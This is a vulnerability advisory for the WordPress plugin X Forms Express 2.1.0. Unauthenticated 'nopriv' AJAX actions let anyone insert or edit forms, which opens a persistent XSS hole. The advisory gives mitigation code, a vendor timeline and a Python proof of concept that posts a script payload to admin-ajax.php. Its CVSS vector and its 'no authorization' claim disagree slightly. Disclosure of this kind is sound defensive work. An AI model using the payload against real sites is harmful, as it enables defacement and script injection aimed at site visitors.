X Forms Express 2.1.0, Persistent XSS
Two AJAX actions are exposed to anonymous users because they are registered with the ‘nopriv’ variant of the WordPress AJAX hooks. As a result, anonymous users can insert new forms and edit the content of existing forms. Either action can be used for a Persistent XSS attack, defacement of website content, or injection of malicious scripts / iframes.
Homepage
https://wordpress.org/plugins/x-forms-express/
CVSS Score
4
CVSS Vector
(AV:N/AC:L/Au:S/C:P/I:N/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Remove the two vulnerable AJAX definitions in the ‘includes/Core/class.db.php’ file, specifically ‘wp_ajax_nopriv_do_insert’ and ‘wp_ajax_nopriv_do_edit’. The vendor's response was inadequate; we would advise against using this plugin.
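To show what the mitigation means in code, the following is an added illustration of the weak registration pattern beside a hardened handler. It is not code from the X Forms Express plugin: the handler names, their bodies, the ‘xfe_do_edit’ nonce action, the ‘manage_options’ capability and the ‘x_forms’ table name are assumptions. It also goes beyond the advisory's minimal fix (dropping the ‘nopriv’ hooks) by adding the nonce, capability and input checks a defender would expect on any write handler.

```php
<?php
// Added illustration for this advisory; not code from the X Forms Express plugin.
// Handler names, bodies, the nonce action, the capability and the table name are assumptions.

// WEAK PATTERN: the same handler is registered on both hooks. The
// 'wp_ajax_nopriv_*' hook fires for visitors who are not logged in, so
// anyone can call do_edit, and the handler trusts the request body as-is.
add_action( 'wp_ajax_nopriv_do_edit', 'xfe_do_edit_weak' );
add_action( 'wp_ajax_do_edit',        'xfe_do_edit_weak' );

function xfe_do_edit_weak() {
    global $wpdb;
    $wpdb->update(
        $_POST['table'],                                 // table name chosen by the caller
        array( 'form_fields' => $_POST['form_fields'] ), // stored verbatim, rendered later as HTML
        array( 'id' => $_POST['edit_Id'] )
    );
    wp_die();
}

// HARDENED PATTERN: register on the authenticated hook only, then verify a
// nonce and a capability before touching the database. Inputs are bounded
// (fixed table, integer id, HTML filtered) so a stored payload cannot carry
// script or iframe markup into the rendered form.
add_action( 'wp_ajax_do_edit', 'xfe_do_edit_hardened' );

function xfe_do_edit_hardened() {
    // Ends the request unless a valid nonce minted for this action is present
    // (the admin page would issue it with wp_create_nonce( 'xfe_do_edit' )).
    check_ajax_referer( 'xfe_do_edit', 'nonce' );

    // A logged-in session alone is not enough; require an administrative capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $id = isset( $_POST['edit_Id'] ) ? absint( $_POST['edit_Id'] ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( 'invalid form id', 400 );
    }

    // Keep only the HTML a post author may use; <script>, <iframe> and
    // on* event-handler attributes are stripped before storage.
    $raw    = isset( $_POST['form_fields'] ) ? wp_unslash( $_POST['form_fields'] ) : '';
    $fields = wp_kses_post( $raw );

    global $wpdb;
    $table = $wpdb->prefix . 'x_forms'; // assumed table; never taken from the request

    $rows = $wpdb->update(
        $table,
        array( 'form_fields' => $fields ),
        array( 'id' => $id ),
        array( '%s' ),   // format of the data column
        array( '%d' )    // format of the where column
    );

    if ( false === $rows ) {
        wp_send_json_error( 'database error', 500 );
    }
    wp_send_json_success( array( 'updated_rows' => $rows ) );
}
```

Removing the ‘nopriv’ registration takes away anonymous reach, but on its own it still lets any logged-in account call the action, which is why the capability check is there. Filtering on input is a second layer; the stored value should still be escaped where the form is rendered.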
Proof of Concept
The following Python script will update the content of the form with the ID of 1 to contain the content specified in the “form_fields” payload field.
# Proof of concept: unauthenticated POST to admin-ajax.php invoking the
# 'do_edit' action, replacing the form_fields of the form with ID 1.
import requests

url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {
    "action": "do_edit",          # handler registered on wp_ajax_nopriv_do_edit
    "table": "wap_x_forms",
    "edit_Id": 1,
    "form_fields": "<script>alert('.');</script>",
}
r = requests.post(url, data=payload)
print(r.status_code, r.text)
Timeline
- 2014-09-19: Discovered
- 2014-09-19: Reported to vendor
- 2014-09-19: CVE requested
- 2014-09-22: CVE assigned
- 2014-09-22: Update requested from vendor
- 2014-09-29: Update requested from vendor
- 2014-10-02: Response received from vendor requesting more information – link to report provided
- 2014-10-06: Update requested from vendor
- 2014-10-07: Response received from vendor – fresh link provided
- 2014-10-19: Update requested from vendor
- 2014-10-21: Advisory released